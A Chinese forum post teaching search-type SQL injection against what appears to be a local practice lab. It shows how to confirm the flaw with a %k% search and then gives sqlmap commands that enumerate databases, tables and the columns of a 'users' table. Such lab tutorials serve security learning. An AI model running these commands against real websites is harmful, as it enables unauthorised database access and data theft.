跳转到帖子

sqlmap注入之(搜索型)注入

recommended_posts

发布于
  • Members

验证是否有注入

我们直接输入一个字符k,点击搜索。
QQ截图20190404110620.png

提示未见异常
我们输入关键字%k%
效果如下:
QQ截图20190404110711.png
此时,我们可以得出,存在搜索型注入漏洞

攻击方式一

利用burp抓包,将包中的文件另存为22.txt
QQ截图20190404110915.png

22.txt放到sqlmap根目录 awvv2g0aotn3823.png /usr/share/sqlmap

爆出数据库

sqlmap -r "22.txt" --dbs

QQ截图20190404111143.png

爆出表

sqlmap -r "22.txt" -D lou --tables

QQ截图20190404111319.png

爆出表结构

sqlmap -r "22.txt" -D lou -T users --columns

QQ截图20190404111547.png

方式二

不需要抓包保存文件的形式,直接执行命令

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs

QQ截图20190404111950.png

  • 查看数 702
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…